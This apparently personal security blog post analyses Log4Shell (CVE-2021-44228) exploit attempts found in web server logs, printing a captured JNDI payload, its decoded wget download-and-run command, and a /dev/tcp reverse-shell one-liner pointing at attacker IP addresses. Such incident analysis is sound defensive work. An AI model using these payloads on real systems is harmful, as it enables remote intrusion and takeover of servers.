_                        _ _  __  __
   _ __ ___   __ _ _ __| | __   ___ __ _ _ __ __| (_)/ _|/ _|
| '_ ` _ \ / _` | '__| |/ /  / __/ _` | '__/ _` | | |_| |
  | | | | | | (_| | |  |   <  | (_| (_| | | | (_| | |  _|  _|
|_| |_| |_|\__,_|_|  |_|\_\  \___\__,_|_|  \__,_|_|_| |_|

Home Hacker Stuff Hobby Stuff Car Stuff Other Stuff My CV

Log4Shell Exploit Attempts

Bad guys continue to attempt to exploit the vulnerability in log4j known as Log4Shell. CVE-2021-44228.

I have captured the http requests below in web server logs on this site and others:

${jndi:ldap://164.92.110.133:443/Basic/Command/Base64/d2dldCAtbmMgaHR0cDovLzEzLjg5LjQ4LjExOC9hLnNoIC1xIC1QIC90bXAvOyBjaG1vZCA3NzcgL3RtcC9hLnNoOyAvdG1wL2Euc2g7IHJtIC1yZiAvdG1wLyouc2g=}

If the web server was vulnerable, it would execute the base64 encoded commands. What do these decode to?

wget -nc http://13.89.48.118/a.sh -q -P /tmp/; chmod 777 /tmp/a.sh; /tmp/a.sh; rm -rf /tmp/*.sh

These commands will connect to the c&c server, download the file a.sh, execute and then remove any evidence.

I have downloaded the a.sh file, this contains further commands:

nohup bash -c '0<&183-;exec 183<>/dev/tcp/164.92.110.133/45982;sh <&183 >&183 2>&183' &1 &

This is an attempt to set up a reverse shell back to the attacker.

Patch your stuff!